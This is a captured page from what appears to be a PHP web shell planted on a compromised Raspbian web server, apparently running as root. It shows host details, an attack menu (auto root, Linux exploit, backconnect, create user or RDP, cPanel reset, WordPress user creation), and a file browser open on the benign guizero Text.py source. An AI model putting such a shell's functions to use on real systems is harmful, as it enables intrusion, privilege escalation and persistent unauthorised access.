Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
guizero /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
App.py
1.99
KB
-rw-r--r--
Box.py
3.11
KB
-rw-r--r--
ButtonGroup.py
10.2
KB
-rw-r--r--
CheckBox.py
4.63
KB
-rw-r--r--
Combo.py
10.54
KB
-rw-r--r--
ListBox.py
8.05
KB
-rw-r--r--
MenuBar.py
1.32
KB
-rw-r--r--
Picture.py
2.58
KB
-rw-r--r--
PushButton.py
5.2
KB
-rw-r--r--
RadioButton.py
1.7
KB
-rw-r--r--
Slider.py
2.59
KB
-rw-r--r--
Text.py
2.71
KB
-rw-r--r--
TextBox.py
3.7
KB
-rw-r--r--
Waffle.py
10.4
KB
-rw-r--r--
Window.py
1.03
KB
-rw-r--r--
__init__.py
715
B
-rw-r--r--
alerts.py
1.17
KB
-rw-r--r--
base.py
18.22
KB
-rw-r--r--
event.py
5.87
KB
-rw-r--r--
tkmixins.py
10.47
KB
-rw-r--r--
utilities.py
11.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Text.py
from tkinter import Label, StringVar from . import utilities as utils from .base import TextWidget class Text(TextWidget): def __init__( self, master, text="", size=12, color="black", bg=None, font="Helvetica", grid=None, align=None, visible=True, enabled=None, width=None, height=None): description = "[Text] object with text \"" + str(text) + "\"" self._text = str(text) tk = Label(master.tk, text=text, fg=utils.convert_color(color), bg=utils.convert_color(bg), font=(font, size)) super(Text, self).__init__(master, tk, description, grid, align, visible, enabled, width, height) if bg: self.bg = bg # PROPERTIES # ---------------------------------- # The text value @property def value(self): return (self._text) @value.setter def value(self, value): self.tk.config(text=value) self._text = str(value) self.description = "[Text] object with text \"" + str(value) + "\"" # The font size @property def size(self): return self.text_size @size.setter def size(self, size): self.text_size = size # METHODS # ------------------------------------------- # Clear text (set to empty string) def clear(self): self._text = "" self.tk.config(text="") # Append some text onto the end of the existing text def append(self, text): new_text = self._text + str(text) self._text = new_text self.tk.config(text=new_text) self.description = "[Text] object with text \"" + new_text + "\"" # DEPRECATED METHODS # -------------------------------------------- # Sets the text colour def color(self, color): self.text_color = color utils.deprecated("Text color() is deprecated. Please use the text_color property instead.") # Set the font def font_face(self, font): self.font = font utils.deprecated("Text font_face() is deprecated. Please use font property instead.") # Set the font size def font_size(self, size): self.size = size utils.deprecated("Text font_size() is deprecated. Please use the size property instead.") # Returns the text def get(self): return self._text utils.deprecated("Text get() is deprecated. Please use the value property instead.") # Sets the text def set(self, text): self._text = str(text) self.tk.config(text=self._text) self.description = "[Text] object with text \"" + str(text) + "\"" utils.deprecated("Text set() is deprecated. Please use the value property instead.")
Close